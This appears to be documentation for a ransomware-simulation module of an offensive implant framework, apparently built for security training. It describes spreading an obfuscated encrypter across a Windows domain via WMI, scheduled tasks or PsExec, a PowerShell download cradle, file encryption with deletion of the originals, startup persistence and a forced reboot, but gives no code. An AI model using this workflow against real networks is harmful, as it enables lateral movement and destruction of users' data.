Ransomware Simulation

Description

This script simulates a ransomware attack by distributing and obfuscated encrypter via WMI, Scheduled Task, or PsExec.

Overview

This script distributes an obfuscated ransomware payload via WMI, Scheduled Task, or PsExec from left to right until on succeeds. The script can use either impersonation or username and password for authentication. For targetting, the script can either pull a list of domain computers from Active Directory instance tied to the current user or take in a target list containing hostnames, IPs, or CIDR ranges. When using auto targetting, the Specter implant must be running under a domain user account. Once a target list is built, the list is resolved to IP addresses. The IP addresses of the localhost are removed from the list so that your foothold in the network is not impacted.

Next, the script performs a multithreaded port scan of each IP on port 445 to identify live hosts. Once that is complete, the script generates a new obfuscated ransomware payload and PowerShell stager script. Those two payloads are cached in the server. Live hosts then are passed to a multithreaded cmdlet to run a PowerShell cradle on each live system that will download the PowerShell stager script that loads the ransomware payload.

The ransomware payload looks for all files in C:\Users\ with specific extensions. It the begins encrypting each file and deleting the original. The encrypted files are stored with the keys to decrypt so that a real threat actor could not use this script to ransom a target. It also gives students an opportunity to practice recovery using forensic malware analysis. Once encryption completes, the ransomware drops a ransom note application and creates a shortcut in the global startup folder. It then reboots the system. The next user to logon will see the ransom note.

Arguments

  • Targets: An array of comma seperated hostnames, IP addresses, or CIDR network ranges (e.g. WKS1.FOO.COM, 192.168.1.7, 10.0.0.0/24)
  • Username: The username of the account to use for authentication.
  • Password: The password for the user account.

Dependencies

  • recon
  • lateral

Operating Systems

  • Windows

Pre-Requisites

  • Valid administrator credentials for the target system(s) or domain.

Example Output

ComputerName  ScheduledTask                     Success
------------  -------------                     -------
192.168.1.2   @{Success=True; Message=Success!}    True
192.168.1.103 @{Success=True; Message=Success!}    True
Scroll to Top